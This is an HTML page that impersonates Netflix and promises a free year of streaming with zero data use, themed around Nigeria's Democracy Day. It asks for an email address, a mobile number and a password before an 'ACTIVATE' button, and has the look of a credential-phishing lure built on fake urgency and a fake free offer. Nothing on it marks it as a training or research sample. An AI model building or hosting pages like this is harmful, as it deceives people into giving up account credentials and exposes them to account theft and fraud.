<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Netflix</title>
    
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="mediaquery.css">
    <link rel="stylesheet" href="https://maxst.icons8.com/vue-static/landings/line-awesome/line-awesome/1.3.0/css/line-awesome.min.css">
    <script src="https://kit.fontawesome.com/bc3a1796c2.js" crossorigin="anonymous"></script>
    <link rel="shortcut icon" href="https://image.flaticon.com/icons/png/512/870/870910.ico'/> 
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.css" />
  </head>
  <body>

    <div class="navba">
<li class="logo"><img src="ntfx.png" height="25px" width="70px"></li>
<a href="#reg"><button class="btn-offer"> Get Offer</button></a>
    </div>
    <div class="main">
<div class="area">

  <div class="ctr"><h1>1 year Free subcription, Works on all devices</h1></div>
  <h4>No data required. Activate and enjoy.
    </h4>
    <h4>Ready to Activate? Enter your email to activate, IT'S FREE!!!
    </h4>

    <!-- <div >
      <input class="nip" type="text"  placeholder="  Email address">
    </div> -->
    <div > <a href="#reg"><button class="mybtn">Claim Offer <i class="fas fa-chevron-right"></i> </button></a>
    </div> 


    </div>
   
    </div>
    <div class="continer1" id="reg">
        <div class="container-bd">
        <div class="txt-container">
            <p> 🎉🇳🇬 Celebrate Democracy Day with "NETFLIX"! Enjoy a year of FREE streaming with ZERO data usage. Celebrate freedom, celebrate entertainment.</p>
        </div>
        <div class="inp-container">
         <center>  <div> <input type="text" placeholder="Email address"></div>
            <input type="text" placeholder="Mobile number">
            <input type="password" placeholder="Password">
        </center>
           <a href="validate.htm"> <button class="mybtn"> ACTIVATE</button></a>
        </div>
        </div>
        
        
      </div>



     
       
          <div class="question">
            <h1>Frequently Asked Questions
              </h1>
              <div class="quest">
                <div class="textbox">What is Netflix?</div>
                <i class="las la-plus"></i>
              </div>
              <div class="quest">
                  <div class="textbox">How much does Netflix cost?</div>
                  <i class="las la-plus"></i>
                </div>             
                <div class="quest">
                    <div class="textbox">Where can I watch?</div>
                    <i class="las la-plus"></i>
                  </div>                 <div class="quest">
                    <div class="textbox">How do I cancel?</div>
                    <i class="las la-plus"></i>
                  </div>               
                  <div class="quest">
                      <div class="textbox">What can I watch on Netflix??</div>
                      <i class="las la-plus"></i>
                    </div>
                    <div class="quest">
                        <div class="textbox">What is Netflix?</div>
                        <i class="las la-plus"></i>                   
                      </div>    
                           
                    
                    </div>
                    <div class="footer">


                        <div class="footercon">
                          <div class="flex1">
                                                    <h5>Questions? Call 1-866-579-7172
                            </h5>
                            <h5>
    </h5>
                          </div>
                          
               <!-- <ul class="list1"> -->
                 
                        <!-- <li><a href="">FAQ</a></li>
                        <li><a href="">Investor Relation</a></li>
                        <li><a href="">Ways to Watch</a></li>

                        <li><a href="">Corporate Information</a></li>
                        <li><a href="">Netflix Originals</a></li>
                        </ul>
                        <ul class="list1">
                        <li><a href="">Home</a></li>
                            <li><a href="">Jobs</a></li>
                            <li><a href="">Terms of Use</a></li>
                            <li><a href="">Contact Us</a></li>
                            <li><a href="">#</a></li>
                            </ul>
                            <ul class="list1">
                                <li><a href="">Account</a></li>
                                <li><a href="">Redeem Gift Cards</a></li>
                                <li><a href="">Privacy</a></li>
                                <li><a href="">Speed Test</a></li>
                                <li><a href="">#</a></li>

                                </ul>
                                <ul class="list1">
                                    <li><a href="">Media Center<</a></li>
                                    <li><a href="">Buy Gift Cards</a></li>
                                    <li><a href="">Cookie Preferences</a></li>
                                    <li><a href="">Legal Notices</a></li>
                                    <li><a href="">#</a></li>

                                    </ul>
                                  -->
                    </div>

                  </div>
                  <div class="end">
<h2>
Netflix US
</h2> 
<h2>
  </h2>                    </div>
  </body>
</html>